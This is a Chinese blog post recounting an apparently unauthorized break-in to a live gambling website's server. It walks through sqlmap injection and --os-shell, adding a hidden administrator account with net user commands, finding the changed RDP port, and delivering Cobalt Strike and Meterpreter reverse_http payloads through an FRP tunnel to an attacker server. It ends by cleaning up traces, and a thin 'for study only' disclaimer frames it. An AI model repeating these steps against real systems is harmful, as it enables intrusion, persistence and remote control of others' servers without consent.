利用CS4.0和FRP拿下“打牌”网站服务器
利用CS4.0和FRP拿下“打牌”网站服务器
- 环境的部署
- CS4.0服务器部署
- 踩坑点
- frp部署
- 开始打牌
- 抓个包
- 还没有结束
- 声明:本文旨在技术学习研究,请勿用于违法用途,否则后果自负。
环境的部署
CS4.0服务器部署
这里用的是阿里云服务器,也可以部署在本地
首先上传cs4.0压缩包到服务器,执行解压
执行命令./teamserver ip passwd
开启服务器
完成之后我们打开本地CS4.0连接服务器,Host就写服务器IP,密码也是之前写的
成功连接
踩坑点
- 服务器的端口一定要设置开启
- 修改teamserver的权限为777
frp部署
同样先把安装包上传到服务器端和客户端然后解压
服务器端将frps权限改为777,同时修改frps.ini文件,设置端口。
vim frps.ini
frps -c frps.ini
开启服务
kali端其他同理
vim frpc.ini
server_addr就是服务器IP,端口就是之前设置的端口
local_ip回环就行,端口随便设置不常用的,后面要用到
./frpc -c frpc.ini
开启服务
如果不想多开终端可以使用nohup+重定向
开始打牌
抓个包
找到后台页面
抓个登陆包
丢到sqlmap里面去跑跑,成功拿到数据库
这里找了一下终于在RYPlatforManagerDB
里面找到了账户信息
密码是加密的,用自带的解密工具得出了顶级弱口令admin-admin
成功进入后台
乱点一通,没发现啥啥比较容易利用的,重新回到sqlmap
用–is-dba参数判断得出当前用户为DBA
接下来就使用–os-shell参数试试能不能拿到shell,经过漫长等待最终成功了
whoami
发现令人惊喜一幕
这还能说啥,直接上命令了
net user test QWer1234! /add
net localgroup administrators test /add
接下来就尝试一波RDP连接,不出意外失败了
思考了一下原因,决定从RDP这个服务本身开始进行排错
首先确认一下RDP这个服务是不是开着的,不管了直接用net start termservice
的命令,反正最终也要打开这个服务
服务是开着的,那么可能性就多了,这时最怕遇到的就是管理员开了白名单,那就白忙活一场
既然都到这了肯定不能放弃,就先从最简单的点进行排错
由于sqlmap的回显是出奇的慢,得想个办法,在得到想要的结果的同时尽可能去缩减回显的内容,这样就可以加快回显的速度,提高效率。
经过一番百度,终得出这样的思路:既然服务开启,那么就会有对应的进程,RDP的服务对应的进程名称是svchost.exe,描述是termservice,那么可以查看带有termservice描述的svchost.exe进程去拿到进程PID,然后通过PID去获取服务的端口号,同时加上管道符|
还能减少回显内容
尝试之后得到以下命令
tasklist /svc | findstr termservice
netstat -ano | findstr 进程号
这里出了点问题,回显竟然没有任何内容
理论上来说,肯定是有回显才对。
经过一番挣扎,发现忽略了一个细节!不能用termservice
而是要用TermService
,竟然忘记区分大小写了!
重新来过,成功拿到了进程PID 1908
有了PID,就可以反查端口
还好,管理员只是改了端口,并没有开启白名单,有了端口就可以用之前创建的账号进行连接了
看到这个弹窗,就知道有机可乘了
GET!
补丁倒是不少
还没有结束
本着不浪费的原则,还是cs上线一波,不然就白白浪费调试cs服务器的时间了
用cs客户端先建立listener,
然后选择Attacks->Web Drive-by->Scripted Web Delivery(s)
,host就写服务器地址,端口随便写,listener就选择刚刚创建的监听,可以得到一条让目标上线的payload
用shell去执行这个payload,过一会就能上线cs了
成功上线~至于为啥会上线这么多个,我也还在思考中,
右键目标,就可以使用很多种攻击方式了
因为菜,所以这是个裸的cs4.0,那么还是回到kali吧
用配置好的frp尝试把这个shell反弹到msf试试
这里需要在cs上重新建立一个新的listener
然后进入msfconsle设置监听本地的1235端口
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
msf5 exploit(multi/handler) > set lport 1235
msf5 exploit(multi/handler) > set lhost 127.0.0.1
msf5 exploit(multi/handler) > run
因为我的1234被占用了我就换成了1235
到cs中右键目标->spawn
选之前建立的msf监听器就行了
不出意外的话,过十秒钟msf就能接受到服务器弹过来的shell,但是这里突然出现了一个状况,cs提示beacon exit , 之前sqlmap的os-shell也断了
我怀疑是管理员上线了,被迫放弃。看来是天意,那就到此为止
总结一下,收获还不错
RDP回去清理了一下战场,收工走人
雕虫小技,大佬多多指点~
声明:本文旨在技术学习研究,请勿用于违法用途,否则后果自负。
利用CS4.0和FRP拿下“打牌”网站服务器相关推荐
- 服务器可以装win7或win10系统吗,win10改win7用legacy还是uefi?_网站服务器运行维护,window...
win7系统关机一直转圈(关不了机)是什么原因?_网站服务器运行维护 win7系统关机一直转圈的原因:1.病毒或一些应用程序或者系统任务有可能造成不能关机或关机慢:2.外设和驱动程序兼容性不好,不能响 ...
- 利用cobaltstrike加sqlmap拿下一个网站并提权
利用cobaltstrike加sqlmap拿下一个网站并提权 Cobalt Strike是一款基于java的渗透测试神器,常被业界人称为CS神器.自3.0以后已经不在使用Metasploit框架而作为 ...
- 渗透工具之CS4.0使用说明书
CS4.0使用说明书 目录 安装 使用 运行 监听器 listner 使用 不同监听介绍 木马 生成后门 钓鱼攻击 邮件钓鱼 功能 上部选项栏 下部工具栏 beacon的使用 会话功能 安装使用 安装 ...
- 利用该0 day漏洞的攻击活动情况
谷歌研究人员发现macOS漏洞利用. 谷歌研究人员在macOS系统中发现了一个安全漏洞--CVE-2021-30869.攻击者利用该漏洞可以以kernel权限执行任意代码.8月底,谷歌研究人员发现了该 ...
- 当WEB2.0从概念变成电子商务网站的工具
当一些WEB2.0模式的网站还将WEB2.0作为概念吸引疯投注意的时候,电子商务巨头亚马逊已经成功地将博客(BLOG)和标签(tag)等具有典型WEB2.0特征的技术和思想应用网站的经营,使得WEB2 ...
- 第1节-从0到1快速建设网站-最终实现商业化盈利
虽互不曾谋面,但希望能和您成为笔尖下的朋友 以读书,技术,生活为主,偶尔撒点鸡汤 不作,不敷衍,意在真诚吐露,用心分享 点击左上方,可关注本刊 标星公众号(ID:itclanCoder) 如果不知道如 ...
- 利用Python为女神制作一个专属网站
快跟随小编一起学习一下如何利用Python语言制作一个专属的网站送给女神吧! 如觉得博主文章写的不错或对你有所帮助的话,还望大家多多支持呀!关注.点赞.收藏.评论. 目录 如觉得博主文章写的不错或对你 ...
- 群晖 python_利用群晖Docker安装ubuntu16.04搭建python网站服务器(安装篇)
折腾的原因:我目前有两个网站需要挂载,因为为了玩,并不是为了大流量,所以就挂在家里的群晖中.一个是小圈子(www.cirdown.com:81),因为用的是discuz论坛,php的,所以直接用我的黑 ...
- HTML加入IP限制代码,利用HTML实现限制ip的投票网站作弊方案
提要:如果大家有任何疑问请给我留言,小编会及时回复大家的.在此也非常感谢大家对素材圈的支持!若你觉得本文对你有帮助,欢迎,烦请注明出处,谢谢! 不少人想了解关于利用HTML实现限制ip的投票网站作弊方 ...
最新文章
- .net 导出html 到excel 合并单元格,C#导出Excel,并且设置Excel单元格格式,合并单元格....
- ai画面怎么调大小_ai如何调整对象大小
- Gym - 101986F Pizza Delivery(最短路+DAG必经边)
- 什么是 restful api
- php撒意思,php表示是什么意思
- python3 def download_python3下载抖音视频
- RMI 异常 no security manager: RMI class loader disabled
- 2018 牛客多校 2
- DiskFileUpload类
- 【保姆级教学】Landsat遥感影像下载
- 微信小程序登录流程理解
- Vue项目中引用‘阿里巴巴字体图标库iconfont’
- 正则表达式之提取数字
- Windows XP SP3 笔记本专用版 电脑疯子 2010年巨献
- alc236黑苹果驱动_黑苹果亮度调节及调节快捷键驱动
- 《软件方法》读后感-三年前端开发的思考,如何有效地阅读需求?
- 8000字前端性能优化技巧总结!(全面)
- 【后端教程】京东API网关实践之路!
- 拿下阿里三面是后,面试官问我:你是怎么学习Redis的?
- 举个栗子!Tableau 技巧(121):用 Makepoint 和 Makeline 函数实现连线地图